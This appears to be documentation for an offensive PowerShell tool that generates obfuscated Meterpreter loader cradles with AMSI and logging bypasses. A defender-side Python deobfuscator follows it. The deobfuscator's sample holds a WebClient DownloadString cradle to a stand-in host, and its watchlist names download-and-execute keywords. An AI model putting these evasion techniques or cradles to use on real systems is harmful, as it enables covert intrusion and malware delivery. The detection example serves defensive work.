Description
Generates an obfuscated PowerShell execution cradle that configures a Meterpreter payload (reverse or bind), applies logging and AMSI bypasses, and outputs a fully obfuscated loader script.
PowerShell Meterpreter Loader Generator
Overview
This PowerShell script builds a Meterpreter PowerShell loader based on user-specified payload and architecture parameters, applies logging and AMSI bypass techniques, and then performs multiple layers of PowerShell obfuscation before emitting the final script text.
The script supports both reverse and bind payload parameter sets and allows the operator to select specific obfuscation and AMSI bypass techniques.
Behavior Summary
- Determines whether to generate a reverse or bind payload loader.
- Generates a PowerShell cradle that downloads and executes the Meterpreter loader.
- Applies PowerShell logging bypass logic.
- Applies an AMSI bypass using the selected technique.
- Combines all components into a single script.
- Performs multiple obfuscation passes (comments, strings, variables, cmdlets, types, and function names).
- Outputs the final obfuscated PowerShell script as text.
Parameters
| Name | Type | Description |
|---|---|---|
| Payload | string | The payload type to generate for reverse connections. Valid values are reverse_tcp, reverse_http, and reverse_https. Defaults to reverse_tcp. |
| Architecture | string | The target architecture of the payload. Valid values are x86 and x64. This parameter is mandatory for both reverse and bind payloads. |
| RHost | string | The remote IP address or hostname that the reverse payload will connect back to. Required when using the reverse parameter set. |
| RPort | int | The TCP port used by the reverse payload for callback communication. Defaults to 4444. |
| LPort | int | The local TCP port that a bind payload will listen on. Defaults to 4444. |
| StringObfuscationTechnique | PwshStringObfuscationTechnique | The string obfuscation technique to apply during payload generation. Defaults to Format. |
| AmsiBypassTechnique | PwshAmsiBypassTechnique | The AMSI bypass technique to use when generating the script. Defaults to InitFailed. |
Output
- Type: string
- Description: A fully combined and obfuscated PowerShell script containing logging bypasses, an AMSI bypass, and a Meterpreter loader cradle.
Notes
- The script emits only the final obfuscated payload and performs no execution by itself.
- Obfuscation filters are explicitly applied to high-risk strings, cmdlets, and .NET types to reduce static detection.
- Default values are selected to maximize compatibility while allowing customization where needed.
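
Because the obfuscation passes target strings to reduce static detection, keyword matching on the raw script text misses names that only exist after evaluation. The following Python code is an added defender-side example, not part of the documented script: it resolves single-level format-operator strings before matching a keyword watchlist. It assumes the Format technique refers to PowerShell's `-f` operator; the watchlist, function names, and sample script are constructed for illustration.

```python
import re

# Assumption: "Format" obfuscation means PowerShell's -f operator with
# shuffled placeholders, e.g. ("{1}{0}" -f 'ost','Write-H').
QUOTED = r"""(?:'[^']*'|"[^"]*")"""
FORMAT_EXPR = re.compile(
    r"""(["'])(?P<fmt>[^"']*\{\d+\}[^"']*)\1\s*-f\s*(?P<args>"""
    + QUOTED + r"(?:\s*,\s*" + QUOTED + r")*)",
    re.IGNORECASE,  # PowerShell operators are case-insensitive (-f / -F)
)

# Constructed watchlist of strings a static rule might look for.
WATCHLIST = ("Net.WebClient", "DownloadString", "Invoke-Expression")

def _resolve(match):
    """Evaluate one format expression; leave malformed ones untouched."""
    args = [q[1:-1] for q in re.findall(QUOTED, match["args"])]
    try:
        text = re.sub(r"\{(\d+)\}", lambda m: args[int(m[1])], match["fmt"])
    except IndexError:  # placeholder index has no matching argument
        return match[0]
    return "'" + text + "'"

def deobfuscate(script):
    """Replace each single-level -f expression with its resolved literal."""
    return FORMAT_EXPR.sub(_resolve, script)

def match_watchlist(script):
    lowered = script.lower()
    return sorted(term for term in WATCHLIST if term.lower() in lowered)

def scan(script):
    """Compare watchlist hits before and after normalization."""
    return {
        "raw": match_watchlist(script),
        "normalized": match_watchlist(deobfuscate(script)),
    }

# Constructed sample input; example.invalid is a reserved, non-resolving name.
SAMPLE = r'''
$c = New-Object ("{1}{0}" -f 'WebClient','Net.')
$c.("{2}{0}{1}" -F 'load','String','Down')('https://example.invalid/a')
'''

if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
    print(scan(SAMPLE))
```

Nested or concatenated expressions are not resolved by this single pass; a PowerShell AST-based normalizer is the more robust option for production tooling.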
